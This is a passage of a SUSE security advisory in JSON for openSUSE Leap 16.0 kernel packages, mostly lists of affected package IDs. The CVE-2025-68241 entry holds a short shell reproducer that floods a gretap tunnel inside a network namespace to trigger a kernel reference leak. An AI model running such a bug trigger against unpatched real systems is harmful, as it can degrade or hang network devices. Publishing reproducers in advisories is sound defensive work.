"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68227"
},
{
"cve": "CVE-2025-68241",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68241"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv4: route: Prevent rt_bind_exception() from rebinding stale fnhe\n\nThe sit driver\u0027s packet transmission path calls: sit_tunnel_xmit() -\u003e\nupdate_or_create_fnhe(), which lead to fnhe_remove_oldest() being called\nto delete entries exceeding FNHE_RECLAIM_DEPTH+random.\n\nThe race window is between fnhe_remove_oldest() selecting fnheX for\ndeletion and the subsequent kfree_rcu(). During this time, the\nconcurrent path\u0027s __mkroute_output() -\u003e find_exception() can fetch the\nsoon-to-be-deleted fnheX, and rt_bind_exception() then binds it with a\nnew dst using a dst_hold(). When the original fnheX is freed via RCU,\nthe dst reference remains permanently leaked.\n\nCPU 0 CPU 1\n__mkroute_output()\n find_exception() [fnheX]\n update_or_create_fnhe()\n fnhe_remove_oldest() [fnheX]\n rt_bind_exception() [bind dst]\n RCU callback [fnheX freed, dst leak]\n\nThis issue manifests as a device reference count leak and a warning in\ndmesg when unregistering the net device:\n\n unregister_netdevice: waiting for sitX to become free. Usage count = N\n\nIdo Schimmel provided the simple test validation method [1].\n\nThe fix clears \u0027oldest-\u003efnhe_daddr\u0027 before calling fnhe_flush_routes().\nSince rt_bind_exception() checks this field, setting it to zero prevents\nthe stale fnhe from being reused and bound to a new dst just before it\nis freed.\n\n[1]\nip netns add ns1\nip -n ns1 link set dev lo up\nip -n ns1 address add 192.0.2.1/32 dev lo\nip -n ns1 link add name dummy1 up type dummy\nip -n ns1 route add 192.0.2.2/32 dev dummy1\nip -n ns1 link add name gretap1 up arp off type gretap \\\n local 192.0.2.1 remote 192.0.2.2\nip -n ns1 route add 198.51.0.0/16 dev gretap1\ntaskset -c 0 ip netns exec ns1 mausezahn gretap1 \\\n -A 198.51.100.1 -B 198.51.0.0/16 -t udp -p 1000 -c 0 -q \u0026\ntaskset -c 2 ip netns exec ns1 mausezahn gretap1 \\\n -A 198.51.100.1 -B 198.51.0.0/16 -t udp -p 1000 -c 0 -q \u0026\nsleep 10\nip netns pids ns1 | xargs kill\nip netns del ns1",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68241",
"url": "https://www.suse.com/security/cve/CVE-2025-68241"
},
{
"category": "external",
"summary": "SUSE Bug 1255157 for CVE-2025-68241",
"url": "https://bugzilla.suse.com/1255157"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
